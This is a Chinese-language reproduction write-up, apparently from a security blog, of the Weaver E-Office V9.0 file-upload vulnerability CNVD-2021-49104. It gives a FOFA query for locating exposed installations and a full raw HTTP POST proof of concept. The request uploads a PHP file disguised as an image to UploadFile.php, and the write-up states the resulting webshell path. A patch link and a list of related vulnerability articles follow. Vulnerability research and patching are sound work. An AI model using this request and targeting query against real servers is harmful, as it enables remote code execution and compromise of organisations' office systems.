泛微E-Office文件上传漏洞(CNVD-2021-49104)
泛微E-Office文件上传漏洞(CNVD-2021-49104)
漏洞描述
泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。
CNVD编号
CNVD-2021-49104
FOFA语句
app="泛微-EOffice"
影响范围
泛微e-office V9.0
漏洞危害
高危
文件上传可直接get webshell
漏洞复现
使用FOFA进行资产收集
漏洞POC
构造请求上传文件即可
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 192
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg<?php phpinfo();?>--e64bdf16c554bbc109cecef6451c26a4--
上传phpinfo()
上传成功后访问 /images/logo/logo-eoffice.php
修复建议
厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip
泛微E-Office文件上传漏洞(CNVD-2021-49104)相关推荐
- 泛微E-Office最新文件上传漏洞(CNVD-2021-49104)
0x00 漏洞介绍 泛微e-office是泛微旗下的一款标准协同移动办公平台.主要面向中小企业.该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包, ...
- 泛微e-cology9前台文件上传漏洞复现
目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现
- (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)
漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...
- 泛微OA V8 SQL注入漏洞和文件上传漏洞
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...
- 某office前台任意文件上传漏洞分析
X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...
- 【合天网安】FCKeditor 2.4.3文件上传漏洞
[合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...
- 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell
点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...
- kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor=4.1.5 文件上传漏洞利用...
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use 漏洞存影响版本:小于等于4. ...
- 上传图片被防火墙拦截_Web安全:文件上传漏洞
文章来源:计算机与网络安全 一般将文件上传归类为直接文件上传与间接文件上传.直接文件上传就是服务器根本没有做任何安全过滤,导致攻击者可以直接上传小马文件及大马文件(如ASP.ASPX.PHP.JSP及 ...
最新文章
- c语言循环并行处理,C语言设计并行处理
- mysql语句大全 新浪博客_MySQL语句入门
- ddos ***之 SYN Flood
- HihoCoder - 1175 拓扑排序·二
- [转] 实战 SSH 端口转发
- win7系统怎么打开屏幕键盘
- java封装json串示例_Java JSON示例
- 计算机毕业设计java+jsp学科竞赛管理系统(源码+系统+mysql数据库+Lw文档)
- 收集一些电子书下载的网站
- Conjugate function and Fenchel’s duality theorem
- C++ 缺省参数 详解
- 计算机怎样将多行文字转换成表格,用WPS文本表格转换快速合并多行文字
- 安装ms word时需要的正版windows xp序列号
- 学长冷月带你怒刷LeetCode之反转链表
- Ubuntu配置Hadoop——(七)安装配置Spark
- 百练 / 2019计算机学科夏令营上机考试 F:跳蛙
- 51智能小车(舵机、超声波、蓝牙)
- 抖音视频怎样放到项目中使用php,快手、抖音、微视类短视频SDK接入教程,7步就能搞定...
- Spring tool suit 配置springboot环境或maven环境
- HDU4507 吉哥系列故事――恨7不成妻 数位DP
热门文章
- 租用国外服务器应该注意哪些?
- c语言调用延时子程序的例子,C语言精确延时.doc
- flutter_engine 交叉编译【自定义编译器(最新)】
- openstack-ocata版本nova MQ(rpc)接收端(server)浅析
- android 全景拼接软件,DetuStitch(全景拼接软件)
- 关于计算机课的课后感受,计算机课心得体会范文
- Github项目(克隆,上传)简单git命令流程使用记录
- C++ opencv视频处理与保存
- c语言程序设计工作任务,C语言程序设计任务驱动教程
- 大火的扩散模型终于杀到了NLP领域